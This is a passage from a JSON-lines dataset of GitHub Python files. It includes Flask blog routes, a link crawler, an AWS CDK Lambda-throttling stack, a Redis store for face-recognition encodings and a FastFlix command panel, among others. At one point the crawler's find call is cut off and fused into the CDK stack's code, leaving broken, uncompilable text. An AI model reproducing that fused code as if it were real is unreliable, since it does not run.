a_{i,up} - 1/2) (a^{\\dagger}_{i,down}a_{i,down} - 1/2)\n \"\"\" # noqa:W605 E501\n hamiltonian = get_fermi_hubbard_hamiltonian(\n x_dimension,\n y_dimension,\n tunneling,\n coulomb,\n chemical_potential,\n magnetic_field,\n periodic,\n spinless,\n particle_hole_symmetry,\n )\n\n save_interaction_operator(hamiltonian, \"hamiltonian.json\")\n","repo_name":"zapatacomputing/z-quantum-solid-state","sub_path":"steps/fermi_hubbard_model.py","file_name":"fermi_hubbard_model.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15950812607","text":"from math import ceil\r\n\r\nfrom flask import current_app as app\r\nfrom flask import (\r\n render_template,\r\n request,\r\n redirect,\r\n url_for,\r\n flash\r\n)\r\n\r\nfrom app.utils import get_config\r\nfrom app.utils.markdown import get_markdown\r\nfrom app.models import db, Posts\r\n\r\nfrom app.main import main\r\n\r\n@main.route(\"/posts\", methods=['GET'])\r\ndef posts():\r\n page = request.args.get(\"page\", default=1, type=int)\r\n\r\n if page <= 0:\r\n flash(message=\"None valid page.\", category=\"warning\")\r\n return redirect(url_for(\".posts\"))\r\n\r\n # Case of post pages \r\n posts = Posts.query.filter_by(hidden=False).order_by(Posts.idx.desc())\\\r\n .offset((page-1) * get_config(\"post_page_size\"))\\\r\n .limit(get_config(\"post_page_size\"))\\\r\n .all()\r\n \r\n counts = ceil(Posts.query.filter_by(hidden=False).count() / get_config(\"post_page_size\"))\r\n\r\n print(counts)\r\n\r\n return render_template( f\"/front/{get_config('front_theme')}/posts/index.html\",\r\n path='',\r\n posts=posts,\r\n counts=counts,\r\n page=page )\r\n\r\n\r\n@main.route(\"/posts/\", methods=['GET'])\r\ndef post_detail(post_idx):\r\n post = Posts.query.filter_by(idx=post_idx,\r\n hidden=False).first()\r\n\r\n if post == None:\r\n flash(message=\"None valid post selected.\", category=\"error\")\r\n return redirect(url_for(\".posts\"))\r\n \r\n return render_template( f\"/front/{get_config('front_theme')}/posts/detail.html\",\r\n post=get_markdown(post.fullpath),\r\n title=post.title,\r\n abstract=post.abstract )\r\n\r\n","repo_name":"kkamikoon/ownblog","sub_path":"app/main/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"35363910635","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 8 13:55:13 2018\n\n@author: yyuan1\n\"\"\"\nimport urllib\n\ndef get_page(url):\n f = urllib.request.urlopen(url)\n htmlPage = f.read().decode('utf-8') #https://stackoverflow.com/questions/47056068/python-3-6-typeerror-a-bytes-like-object-is-required-not-str-when-trying-to\n return htmlPage\n\ndef get_next_target(page):\n start_link = page.find(' None:\n super().__init__(scope, construct_id, **kwargs)\n\n self.sns_topic = sns.Topic(self, \"LambdaIvocationsLimitTopic\")\n\n self.func_test = lambda_.Function(\n self,\n \"testLambda\",\n code=lambda_.Code.from_asset(\"assets/lambda/testLambda\"),\n handler=\"index.handler\",\n runtime=lambda_.Runtime.PYTHON_3_9,\n log_retention=logs.RetentionDays.ONE_WEEK,\n timeout=Duration.minutes(15),\n memory_size=128,\n )\n\n self.func_test_alarm = cloudwatch.Alarm(\n self,\n \"LambdaTestAlarm\",\n comparison_operator=cloudwatch.ComparisonOperator.GREATER_THAN_OR_EQUAL_TO_THRESHOLD,\n threshold=5,\n evaluation_periods=30,\n datapoints_to_alarm=5,\n metric=self.func_test.metric_invocations(\n period=Duration.minutes(1),\n ),\n )\n\n self.func_test_alarm.add_alarm_action(\n cloudwatch_actions.SnsAction(self.sns_topic),\n )\n\n self.func_disable_heavy = lambda_.Function(\n self,\n \"disableHeavyLambda\",\n code=lambda_.Code.from_asset(\"assets/lambda/disableHeavyLambda\"),\n handler=\"index.handler\",\n runtime=lambda_.Runtime.PYTHON_3_9,\n log_retention=logs.RetentionDays.ONE_WEEK,\n )\n self.func_disable_heavy.add_to_role_policy(\n iam.PolicyStatement(\n actions=[\"lambda:PutFunctionConcurrency\"], resources=[\"*\"]\n )\n )\n\n self.sns_topic.add_subscription(\n sns_subscriptions.LambdaSubscription(self.func_disable_heavy)\n )\n","repo_name":"parisnakitakejser/video-tutorial-python-code","sub_path":"aws/AWS-CDK/Lambda/disable-lambda-on-to-many-ivocations/infrastructure/lambdaStack.py","file_name":"lambdaStack.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"35994147958","text":"import struct\nimport redis\nimport numpy as np\nimport redis \nimport json\nimport pdb\nimport time\nimport functools\nimport itertools\nfrom utils import GetServicesConfiguration\nfrom logger_utils import init_logger\n\nlogger=init_logger(__name__)\n\n\"\"\"\nin redis we store data for each person as follows:\n\n key Description\n\nPERSON_|ID|_ENC_|nb| : an encoding with number nb for person with id ID\nPERSON_|ID|_ELI_|nb| : Eligibility of the encoding with number nb for person with id ID\nPERSON_|ID|_AGE_|nb| : Age of the encoding with number nb for person with id ID\nPERSON_|ID|_LAST_ENCODING : last number of an inserted for person with id ID, used to generate new keys for future encodings of this person\nPERSON_|ID|_LAST_TIME_MATCHED : last time this person was identified by the facial recognition system\nPERSON_|ID|_NB_TIME_MATCHED : number of times this person was identified by the facial recognition system\nPERSON_|ID|_KALMAN : KALMAN filter parameters\nPERSON_|ID|_LAST_UPDATE_KALMAN : Last time KALMAN filter was updated for identity ID\nPERSON_|ID|_NB_TIME_MATCHED_KALMAN : number of times this person was identified by the tracking system (Kalman filter)\nPERSON_|ID|_LAST_POSITION : last position x,y,z of person with identity ID\nPERSON_|ID|_NB_FRAMES_PROCESSED_KALMAN : \nPERSON_|ID|_CAM_ID: the ID of the camera this person was first detected in\nALL_PERSONS_IDS: IDS of all persons in redis\nID_COUNTER: an id counter\nPERSON_|ID|_ENC_KEYS : stores all the encoding keys of identity ID\nNB_ENC: Number of encodings in redis\n\"\"\"\n\nconfiguration=GetServicesConfiguration()\nr = redis.StrictRedis(host=configuration[\"REDIS_HOST\"],port=6379) \n#r.config_set('maxmemory-policy','noeviction')\nr.set(\"ALL_PERSON_IDS\",json.dumps([]))\nr.set(\"NB_ENC\",0)\n\n############kalman filter save and load data###################\n\ndef getLastKalmanFilterUpdateTimePosition(person_IDs,CAM_ID):\n listToGetTime=[]\n listToGetPosition=[]\n \n\n cam_ids=getCamIds(person_IDs) \n for i,person_ID in enumerate(person_IDs):\n listToGetTime.append(\"PERSON_\"+str(person_ID)+\"_LAST_UPDATE_KALMAN\")\n listToGetPosition.append(\"PERSON_\"+str(person_ID)+\"_LAST_POSITION\")\n if(CAM_ID==cam_ids[i]):\n r.incrby(\"PERSON_\"+str(person_ID)+\"_NB_FRAMES_PROCESSED_KALMAN\",1) \n \n last_update=list(map(float,r.mget(listToGetTime)))\n last_positions=list(map(json.loads,r.mget(listToGetPosition)))\n\n return last_update,np.array(last_positions)\n\n\ndef getMetaDataForIdentityKalman(person_IDs):\n keys_to_get=[]\n for person_ID in person_IDs:\n keys_to_get+=[\"PERSON_\"+str(person_ID)+\"_LAST_UPDATE_KALMAN\",\"PERSON_\"+str(person_ID)+\"_NB_TIME_MATCHED_KALMAN\",\"PERSON_\"+str(person_ID)+\"_NB_FRAMES_PROCESSED_KALMAN\"]\n #logger.debug(time.time(),\"keys_to_get\",keys_to_get)\n data=list(map(float,r.mget(keys_to_get)))\n data=[{\"last_time_matched\":data[3*x],\"nb_times_matched\":data[3*x+1],\"nb_frames_processed\":data[3*x+2]} for x in range(len(person_IDs))] \n \n return data\n\n\ndef saveKalmanFilterUpdateTime(last_update_time,person_IDs,CAM_ID):\n dictToSave={}\n\n cam_ids=getCamIds(person_IDs) \n for i,person_ID in enumerate(person_IDs):\n \n dictToSave[\"PERSON_\"+str(person_ID)+\"_LAST_UPDATE_KALMAN\"]=last_update_time[i]\n if(cam_ids[i]==CAM_ID):\n r.incrby(\"PERSON_\"+str(person_ID)+\"_NB_TIME_MATCHED_KALMAN\",1) \n r.mset(dictToSave)\n\n\ndef getKalmanStateFromRedis(person_IDs):\n listToGet=[]\n for person_ID in person_IDs:\n listToGet.append(\"PERSON_\"+str(person_ID)+\"_KALMAN\")\n \n states=list(map(json.loads,r.mget(listToGet)))\n \n return states\n\ndef saveKalmanStateToRedis(jsonStates,person_IDs=[0]):\n ###TODO\n dictToSave={}\n for i,jsonState in enumerate(jsonStates):\n dictToSave[\"PERSON_\"+str(person_IDs[i])+\"_KALMAN\"]=json.dumps(jsonState)\n dictToSave[\"PERSON_\"+str(person_IDs[i])+\"_LAST_POSITION\"]=json.dumps(list(map(float,jsonState[\"x\"][\"data\"].split(\" \")))[0:3])\n r.mset(dictToSave)\n return \n\n\n#####################################################################################################\n\ndef argsort(seq,reverse=True):\n return sorted(range(len(seq)), key=seq.__getitem__,reverse=reverse)\n\ndef removeOldEncodings(nb_to_del,ids=None,INFORMATION_TO_USE=[\"FACE_RECOGNITION\"]):\n if(ids is None):\n ids=get_all_ids()\n all_enc_keys=functools.reduce(lambda x,y:x+y,get_encoding_keys(ids))\n \n logger.debug(\"{} encodings in memory for the ids {}\".format(len(all_enc_keys),ids))\n all_enc_age=r.mget(list(map(lambda x :x.replace(\"ENC\",\"AGE\"),all_enc_keys)))\n #listOfIndex=argsort(all_enc_age)\n \n listOfIndex=np.argpartition(np.array(all_enc_age),len(all_enc_age)-nb_to_del)\n all_enc_keys=[all_enc_keys[i] for i in listOfIndex]\n \n for i in range(nb_to_del):\n #removeEncoding(all_enc_keys[i],INFORMATION_TO_USE=INFORMATION_TO_USE)\n removeEncoding(all_enc_keys[-i],INFORMATION_TO_USE=INFORMATION_TO_USE)\n\n #r.decrby(\"NB_ENC\",nb_to_del)\n\n \n\ndef control_number_of_encodings_in_redis(max_nb_enc=100,INFORMATION_TO_USE=[\"FACE_RECOGNITION\"]):\n nb_enc=int(r.get(\"NB_ENC\"))\n if(nb_enc>max_nb_enc):\n \n logger.warning(\"Controlling memory size taken by encodings... will delete {} old encodings\".format(max_nb_enc//5))\n removeOldEncodings(max_nb_enc//5,None,INFORMATION_TO_USE)\n\ndef get_all_ids():\n ids=json.loads(r.get(\"ALL_PERSON_IDS\"))\n return ids\n\ndef get_encoding_keys(person_IDs,sample=\"ALL\",max_enc_per_identity=50):\n listToGet=[]\n listAgeToGet=[]\n listOfLen=[] \n for person_ID in person_IDs:\n listToGet.append(\"PERSON_\"+str(person_ID)+\"_ENC_KEYS\")\n \n keys=list(map(json.loads,r.mget(listToGet)))\n \n if(sample ==\"ALL\"):\n return keys\n \"\"\"elif(sample==\"RANDOM LATEST\"):\n for lKey in keys:\n listAgeToGet.append(list(map(lambda x:x.replace(\"ENC\",\"AGE\"),lKey)))\n listOfLen.append(len(lKey))\n listOfLen.insert(0,0)\n ages=functools.reduce(lambda x,y:x+y,listAgeToGet)\n ages=np.array(list(map(int,r.mget(ages))))\n for i,lKey in keys:\n if(i==0):\n ##you are getting many keys at once its the same thing, must store all age in one list per identity implement this tomorow!\n if(listOfLen[i+1]>max_enc_per_identity):\n np.argpartition(ages[listOfLen[i]:listOfLen[i]+listOfLen[i+1]])\n else:\n pass\n \"\"\"\n \n\n\ndef store_new_encoding_key(person_IDs,new_keys,nbs):\n \n keys=get_encoding_keys(person_IDs)\n dictToSave={}\n dictToSaveNbs={}\n for i,k in enumerate(keys):\n keys[i].append(new_keys[i])\n dictToSave[\"PERSON_\"+str(person_IDs[i])+\"_ENC_KEYS\"]=json.dumps(keys[i])\n dictToSaveNbs[\"PERSON_\"+str(person_IDs[i])+\"_LAST_ENCODING\"]=nbs[i]\n \n r.mset(dictToSave)\n updateLastInsertedEncodingKey(person_IDs,nbs,dictToSaveNbs)\n\ndef remove_encoding_key(person_ID,key,INFO=[\"FACE_RECOGNITION\"]):\n keys=get_encoding_keys([person_ID])[-1]\n keys.remove(key)\n if(len(keys)>0):\n r.set(\"PERSON_\"+str(person_ID)+\"_ENC_KEYS\",json.dumps(keys))\n else:\n removeIdentity([person_ID],INFORMATION_TO_USE=INFO)\n\n\ndef addPerson(encoding,create_time,camera_ID,jsonStates=None):\n all_ids=get_all_ids()\n r.setnx(\"ID_COUNTER\",0)\n ID=r.incrby(\"ID_COUNTER\",1)\n all_ids.append(ID)\n r.set(\"ALL_PERSON_IDS\",json.dumps(all_ids))\n #last_time_matched=r.set(\"PERSON_\"+str(ID)+\"_LAST_TIME_MATCHED\",create_time)\n r.set(\"PERSON_\"+str(ID)+\"_CAM_ID\",str(camera_ID))\n logger.debug(\"Adding new person for camera {0} with ID {1}\".format(camera_ID,ID))\n if(jsonStates is not None):\n saveKalmanStateToRedis(jsonStates,[ID])\n r.mset({\"PERSON_\"+str(ID)+\"_NB_TIME_MATCHED_KALMAN\":-1,\"PERSON_\"+str(ID)+\"_NB_FRAMES_PROCESSED_KALMAN\":0})\n saveKalmanFilterUpdateTime([create_time],[ID],str(camera_ID))\n logger.performance(\"aaaaaaaa\") \n if(encoding is not None): \n #r.mset({\"PERSON_\"+str(ID)+\"_NB_TIME_MATCHED\":-1,\"PERSON_\"+str(ID)+\"_NB_FRAMES_PROCESSED\":0,\"PERSON_\"+str(ID)+\"_ENC_KEYS\":json.dumps([])})\n r.mset({\"PERSON_\"+str(ID)+\"_NB_TIME_MATCHED\":-1,\"PERSON_\"+str(ID)+\"_NB_FRAMES_PROCESSED\":0,\"PERSON_\"+str(ID)+\"_ENC_KEYS\":json.dumps([]),\"PERSON_\"+str(ID)+\"_VERIFIED\":0})\n updateLastInsertedEncodingKey([ID],[0])\n storeEncoding([ID],[encoding],create_time,str(camera_ID))\n\n\ndef toRedis(dict_of_enc):\n \"\"\"Store given Numpy array 'a' in Redis under key 'n'\"\"\"\n for key in dict_of_enc.keys():\n h, w = dict_of_enc[key].shape\n shape = struct.pack('>II',h,w)\n\n dict_of_enc[key] = shape + dict_of_enc[key].astype(np.float32).tobytes()\n # Store encoded data in Redis\n r.mset(dict_of_enc)\n return\n\ndef fromRedis(encoded):\n \"\"\"Retrieve Numpy array from Redis key 'n'\"\"\"\n #encoded = r.get(n)\n h, w = struct.unpack('>II',encoded[:8])\n a = np.frombuffer(encoded, dtype=np.float32, offset=8).reshape(h,w)\n return a\n\ndef getLastInsertedEncodingKey(person_IDs):\n \"\"\"get the number of the last encoding inserted\n \"\"\"\n listToGet=[]\n for person_ID in person_IDs:\n listToGet.append(\"PERSON_\"+str(person_ID)+\"_LAST_ENCODING\")\n return list(map(int,r.mget(listToGet)))\n\ndef updateLastInsertedEncodingKey(person_IDs,nbs,dictToSave=None):\n \"\"\"\n \"\"\"\n if(dictToSave is None):\n dictToSave={}\n for i,person_ID in enumerate(person_IDs):\n dictToSave[\"PERSON_\"+str(person_ID)+\"_LAST_ENCODING\"]=nbs[i]\n \n r.mset(dictToSave)\n\ndef getCamIds(person_IDs):\n listToGet=[]\n for person_ID in person_IDs:\n listToGet.append(\"PERSON_\"+str(person_ID)+\"_CAM_ID\")\n \n cam_ids=list(map(lambda x:x.decode(\"utf-8\"),r.mget(listToGet)))\n \n return cam_ids\n\ndef getVerifiedIdentities(person_IDs):\n listToGet=[]\n\n for i,ID in enumerate(person_IDs):\n listToGet.append(\"PERSON_\"+str(person_IDs[i])+\"_VERIFIED\")\n \n return list(map(int,r.mget(listToGet)))\n\n\ndef storeEncoding(person_IDs,encoding,last_time_matched,CAM_ID):\n dict_to_set={}\n dict_to_set_enc={}\n new_encoding_keys_to_add=[]\n \n nbs=getLastInsertedEncodingKey(person_IDs)\n cam_ids=getCamIds(person_IDs) \n r.incrby(\"NB_ENC\",len(encoding))\n \n for i,person_ID in enumerate(person_IDs):\n nbs[i]=nbs[i]+1\n dict_to_set[\"PERSON_\"+str(person_ID)+\"_ELI_\"+str(nbs[i])]=1.0\n dict_to_set[\"PERSON_\"+str(person_ID)+\"_AGE_\"+str(nbs[i])]=0\n dict_to_set[\"PERSON_\"+str(person_ID)+\"_LAST_TIME_MATCHED\"]=last_time_matched\n ##BE CAREFUL HERE IN CASE OF POSSIBLE DETECTION BY MULTIPLE CAMERAS AT THE BEGINING MAYBE U SHOULD REMOVE THE FIRST CONDITION\n #logger.debug(\"Condition on camera ID of the person {0}, current camera ID {1}, ID of the person {2}\".format(cam_ids[i],CAM_ID,person_ID))\n if(nbs[i]<7 and cam_ids[i]==CAM_ID):\n r.incrby(\"PERSON_\"+str(person_ID)+\"_NB_TIME_MATCHED\",1)\n\n new_encoding_keys_to_add.append(\"PERSON_\"+str(person_ID)+\"_ENC_\"+str(nbs[i]))\n dict_to_set_enc[\"PERSON_\"+str(person_ID)+\"_ENC_\"+str(nbs[i])]=encoding[i]\n #updateLastInsertedEncodingKey(person_ID,nb+1)\n \n toRedis(dict_to_set_enc)\n store_new_encoding_key(person_IDs,new_encoding_keys_to_add,nbs)\n r.mset(dict_to_set)\n\n\ndef getIdentitySpecificData(person_IDs):\n keys_to_get=[]\n for person_ID in person_IDs:\n keys_to_get+=[\"PERSON_\"+str(person_ID)+\"_LAST_TIME_MATCHED\",\"PERSON_\"+str(person_ID)+\"_NB_TIME_MATCHED\",\"PERSON_\"+str(person_ID)+\"_NB_FRAMES_PROCESSED\"]\n #logger.debug(time.time(),\"keys_to_get\",keys_to_get)\n data=list(map(float,r.mget(keys_to_get)))\n data=[{\"last_time_matched\":data[3*x],\"nb_times_matched\":data[3*x+1],\"nb_frames_processed\":data[3*x+2]} for x in range(len(person_IDs))] \n \n return data\n\n\ndef getAllEncodings(person_IDs,CAM_ID):\n \"\"\"\n \"\"\"\n enc=[]\n IDS=[]\n\n new_enc_keys=get_encoding_keys(person_IDs)\n \n cam_ids=getCamIds(person_IDs)\n for i,person_ID in enumerate(person_IDs):\n frames_processed=int(r.get(\"PERSON_\"+str(person_ID)+\"_NB_FRAMES_PROCESSED\"))\n if(frames_processed<6 and CAM_ID==cam_ids[i]):\n r.incrby(\"PERSON_\"+str(person_ID)+\"_NB_FRAMES_PROCESSED\",1)\n\n\n IDS+=len(new_enc_keys[i])*[person_ID]\n\n \n enc_keys=functools.reduce(lambda x,y:x+y,new_enc_keys) \n start= time.time()\n enc=r.mget(enc_keys)\n enc=list(map(lambda x: fromRedis(x).reshape(-1),enc))\n finish=time.time()\n logger.performance(\"time inside get allencodings: {} - nb_retrieved_encodings= {})\".format(finish-start,len(enc_keys)))\n logger.debug(\"number_of_encodings: {}\".format(len(enc)))\n return enc_keys,enc,IDS\n\n\ndef updateEncodingsMetaData(enc_eli,update_eli,enc_age,min_e=0.01):\n \n #increase age for some encodings at once using mset and mget\n nb_eli=len(enc_eli)\n nb_age=len(enc_age)\n updateEli=nb_eli>0\n updateAge=nb_age>0\n\n enc_age=[x.replace(\"ENC\",\"AGE\") for x in enc_age ]\n enc_eli_new=[x.replace(\"ENC\",\"ELI\") for x in enc_eli ]\n start=time.time() \n data=r.mget(enc_age+enc_eli_new)\n finish=time.time()\n logger.performance(\"timemGet:{}, nb_enc_keys_age_eli={}\".format(finish-start,nb_age+nb_eli))\n age=data[:nb_age]\n eli=data[nb_age:]\n #eli=r.mget(enc_eli_new)\n \n \n #age=r.mget(enc_age)\n \n \n dict_age_eli={}\n for i,k_age in enumerate(enc_age):\n dict_age_eli[k_age]=int(age[i])+1\n \n\n \n \n for i,k_eli in enumerate(enc_eli_new):\n dict_age_eli[k_eli]=np.float32(eli[i])*update_eli[i]\n dict_age_eli[k_eli.replace(\"ELI\",\"AGE\")]=0\n\n start=time.time()\n if(updateEli or updateAge):\n r.mset(dict_age_eli)\n finish=time.time()\n \n logger.performance(\"timeSET: {}\".format(finish-start))\n enc_to_del=itertools.compress(enc_eli,np.array(list(map(float,eli)))=3):\n r.set(\"PERSON_\"+str(person_IDs[i])+\"_VERIFIED\",1)\n pass\n \n elif(currentTime-last_time_matched>max_age):\n logger.debug('Removing identity age={}, ID= {}'.format(currentTime-np.float64(r.get(\"PERSON_\"+str(person_IDs[i])+\"_LAST_TIME_MATCHED\")),person_IDs[i]))\n id_to_del.append(person_IDs[i])\n\n if(len(id_to_del)!=0): \n removeIdentity(id_to_del,person_IDs,INFORMATION_TO_USE)\n if(\"FACE_RECOGNITION\" in INFORMATION_TO_USE):\n control_number_of_encodings_in_redis(max_nb_enc=5000,INFORMATION_TO_USE=INFORMATION_TO_USE)\n\ndef removeIdentity(person_IDs,all_ids=None,INFORMATION_TO_USE=[\"TEMPORAL\",\"FACE_RECOGNITION\"]):\n \n if(all_ids is None):\n all_ids=get_all_ids()\n logger.debug(\"removing encodings for newly inserted {}\".format(person_IDs))\n else:\n logger.debug(\"removing encodings for old inserted {}\".format(person_IDs))\n \n\n if(\"FACE_RECOGNITION\" in INFORMATION_TO_USE): \n enc_keys=get_encoding_keys(person_IDs)\n for i,identity_keys in enumerate(enc_keys):\n \n #r.decrby(\"NB_ENC\",len(identity_keys))\n for key in identity_keys:\n # delete the key\n r.delete(key)\n r.delete(key.replace(\"ENC\",\"AGE\"))\n r.delete(key.replace(\"ENC\",\"ELI\"))\n\n r.delete(\"PERSON_\"+str(person_IDs[i])+\"_LAST_TIME_MATCHED\")\n r.delete(\"PERSON_\"+str(person_IDs[i])+\"_NB_TIME_MATCHED\")\n r.delete(\"PERSON_\"+str(person_IDs[i])+\"_LAST_ENCODING\")\n r.delete(\"PERSON_\"+str(person_IDs[i])+\"_ENC_KEYS\")\n if(\"TEMPORAL\" in INFORMATION_TO_USE): \n for i,person_ID in enumerate(person_IDs):\n \n r.delete(\"PERSON_\"+str(person_ID)+\"_LAST_POSITION\")\n r.delete(\"PERSON_\"+str(person_ID)+\"_LAST_UPDATE_KALMAN\")\n r.delete(\"PERSON_\"+str(person_ID)+\"_NB_FRAMES_PROCESSED_KALMAN\") \n r.delete(\"PERSON_\"+str(person_ID)+\"_LAST_TIME_MATCHED_KALMAN\")\n r.delete(\"PERSON_\"+str(person_ID)+\"_NB_TIME_MATCHED_KALMAN\")\n r.delete(\"PERSON_\"+str(person_ID)+\"_KALMAN\") \n \n for i,person_ID in enumerate(person_IDs):\n all_ids.remove(person_IDs[i])\n \n \"\"\"\n enc_key_to_del=[]\n for person_ID in person_IDs:\n enc_keys=get_encoding_keys(person_ID)\n enc_key_to_del+=enc_keys\n for key in enc_keys:\n # delete the key\n enc_key_to_del+=[key.replace(\"ENC\",\"AGE\"),key.replace(\"ENC\",\"ELI\")]\n\n enc_key_to_del+=[\"PERSON_\"+str(person_ID)+\"_LAST_TIME_MATCHED\"]\n enc_key_to_del+=[\"PERSON_\"+str(person_ID)+\"_NB_TIME_MATCHED\"]\n enc_key_to_del+=[\"PERSON_\"+str(person_ID)+\"_LAST_ENCODING\"]\n enc_key_to_del+=[\"PERSON_\"+str(person_ID)+\"_ENC_KEYS\"]\n r.delete(enc_key_to_del)\n all_ids.remove(person_ID)\n \"\"\"\n r.set(\"ALL_PERSON_IDS\",json.dumps(all_ids))\n\ndef removeEncoding(encoding_key,INFORMATION_TO_USE=[\"FACE_RECOGNITION\"]):\n \"\"\"\n \"\"\" \n \n logger.debug(f'removing encoding {encoding_key}')\n #nb=encoding_key.split('_')[-1]\n #delete corresponding age of the encoding from redis\n r.delete(encoding_key.replace(\"ENC\",\"AGE\"))\n #logger.debug(encoding_key) \n #############\"be careful potential bug after if u include id for store or cam\n remove_encoding_key(int(encoding_key.split(\"_\")[1]),encoding_key,INFORMATION_TO_USE)\n #delete corresponding eligibility of the encoding from redis\n r.delete(encoding_key.replace(\"ENC\",\"ELI\"))\n \n r.decrby(\"NB_ENC\",1)\n #delete encoding from redis\n r.delete(encoding_key)\n \n\n\n","repo_name":"appstud/appstud-glens-backend","sub_path":"glens/worker/tracking-worker/interfaceToRedis.py","file_name":"interfaceToRedis.py","file_ext":"py","file_size_in_byte":19254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25433864406","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport math\nfrom pathlib import Path\n\nimport reusables\nfrom qtpy import QtCore, QtGui, QtWidgets\n\n\nclass Loop(QtWidgets.QGroupBox):\n def __init__(self, parent, condition, commands, number, name=\"\"):\n super(Loop, self).__init__(parent)\n layout = QtWidgets.QVBoxLayout()\n layout.addWidget(QtWidgets.QLabel(f\"Loop: {name}\"))\n self.condition = condition\n self.number = number\n self.setStyleSheet(\"QGroupBox{padding-top:15px; margin-top:-18px}\")\n\n for index, item in enumerate(commands, 1):\n new_item = Command(parent, item.command, index, item.name)\n layout.addWidget(new_item)\n self.setLayout(layout)\n\n\nclass Command(QtWidgets.QTabWidget):\n def __init__(self, parent, command, number, name=\"\", enabled=True):\n super(Command, self).__init__(parent)\n self.command = command\n self.widget = QtWidgets.QTextBrowser()\n self.widget.setReadOnly(True)\n self.widget.setText(command)\n self.widget.setDisabled(not enabled)\n font_height = QtGui.QFontMetrics(self.widget.document().defaultFont()).height()\n lines = math.ceil(len(command) / 200)\n self.setMinimumHeight(int(font_height + ((lines + 2) * (font_height * 1.25))))\n\n grid = QtWidgets.QGridLayout()\n grid.addWidget(QtWidgets.QLabel(f\"Command {number}\" if not name else name), 0, 0, 1, 2)\n grid.addWidget(self.widget, 1, 0, 1, 2)\n self.setLayout(grid)\n\n\nclass CommandList(QtWidgets.QWidget):\n def __init__(self, parent):\n super(CommandList, self).__init__(parent)\n self.video_options = parent\n\n layout = QtWidgets.QGridLayout()\n\n top_row = QtWidgets.QHBoxLayout()\n top_row.addWidget(QtWidgets.QLabel(\"Commands to execute\"))\n\n copy_commands_button = QtWidgets.QPushButton(\n self.style().standardIcon(QtWidgets.QStyle.SP_ToolBarVerticalExtensionButton), \"Copy Commands\"\n )\n copy_commands_button.setToolTip(\"Copy all commands to the clipboard\")\n copy_commands_button.clicked.connect(lambda: self.copy_commands_to_clipboard())\n\n save_commands_button = QtWidgets.QPushButton(\n self.style().standardIcon(QtWidgets.QStyle.SP_DialogSaveButton), \"Save Commands\"\n )\n save_commands_button.setToolTip(\"Save commands to file\")\n save_commands_button.clicked.connect(lambda: self.save_commands_to_file())\n\n top_row.addStretch()\n top_row.addWidget(copy_commands_button)\n top_row.addWidget(save_commands_button)\n\n layout.addLayout(top_row, 0, 0)\n\n self.inner_widget = QtWidgets.QWidget()\n\n self.scroll_area = QtWidgets.QScrollArea(self)\n self.scroll_area.setMinimumHeight(200)\n\n layout.addWidget(self.scroll_area)\n self.commands = []\n self.setLayout(layout)\n\n def _prep_commands(self):\n return f\"\\r\\n\".join(self.commands) if reusables.win_based else f\"\\n\".join(self.commands)\n\n def copy_commands_to_clipboard(self):\n cmds = self._prep_commands()\n self.video_options.main.container.app.clipboard().setText(cmds)\n\n @reusables.log_exception(\"fastflix\", show_traceback=False)\n def save_commands_to_file(self):\n ext = \".bat\" if reusables.win_based else \".sh\"\n filename = QtWidgets.QFileDialog.getSaveFileName(\n self, caption=\"Save Video As\", directory=str(Path(\"~\").expanduser()), filter=f\"Save File (*{ext})\"\n )\n if filename and filename[0]:\n Path(filename[0]).write_text(self._prep_commands())\n\n def update_commands(self, commands):\n if not commands:\n return\n self.inner_widget = QtWidgets.QWidget()\n sp = QtWidgets.QSizePolicy()\n sp.setHorizontalPolicy(QtWidgets.QSizePolicy.Policy.Maximum)\n self.inner_widget.setSizePolicy(sp)\n layout = QtWidgets.QVBoxLayout()\n layout.setSpacing(5)\n self.commands = []\n for index, item in enumerate(commands, 1):\n if item.item == \"command\":\n new_item = Command(self.scroll_area, item.command, index, name=item.name)\n self.commands.append(item.command)\n layout.addWidget(new_item)\n elif item.item == \"loop\":\n new_item = Loop(self.scroll_area, item.condition, item.commands, index, name=item.name)\n layout.addWidget(new_item)\n layout.addStretch()\n self.inner_widget.setLayout(layout)\n self.scroll_area.setWidget(self.inner_widget)\n self.scroll_area.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.inner_widget.setFixedWidth(self.scroll_area.width() - 3)\n\n def resizeEvent(self, event: QtGui.QResizeEvent):\n self.inner_widget.setFixedWidth(self.scroll_area.width() - 3)\n return super(CommandList, self).resizeEvent(event)\n","repo_name":"buckeytuker/FastFlix","sub_path":"fastflix/widgets/panels/command_panel.py","file_name":"command_panel.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"18204333292","text":"class Solution:\n def majorityElement(self, nums: List[int]) -> List[int]:\n ans1 = 0\n ans2 = 1\n count1 = 0\n count2 = 0\n\n for num in nums:\n if num == ans1:\n count1 += 1\n elif num == ans2:\n count2 += 1\n elif count1 == 0:\n ans1 = num\n count1 = 1\n elif count2 == 0:\n ans2 = num\n count2 = 1\n else:\n count1 -= 1\n count2 -= 1\n\n return [ans for ans in (ans1, ans2) if nums.count(ans) > len(nums) // 3]\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0229. Majority Element II/0229.py","file_name":"0229.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"40979850531","text":"import LinkedList\n\nslot = [[]] * 100 #100개의 empty slot\n\nwhile True:\n e_input = input(\"input mode (1:store 2:search 3:show_hash_table 4:end) : \")\n if (e_input.isdigit() and 0 <= int(e_input) <= 5):\n mode = int(e_input)\n if(mode ==1): #store mode\n while(True):\n e_student_id = input(\"enter student ID (key) : \")\n if (e_student_id.isdigit()):\n student_id = int(e_student_id)\n student_name = input(\"enter student name (value) : \")\n student = [student_id,student_name] #student의 id와 이름으로 list를 만든다.\n hash_key = LinkedList.hash_function(student_id)\n 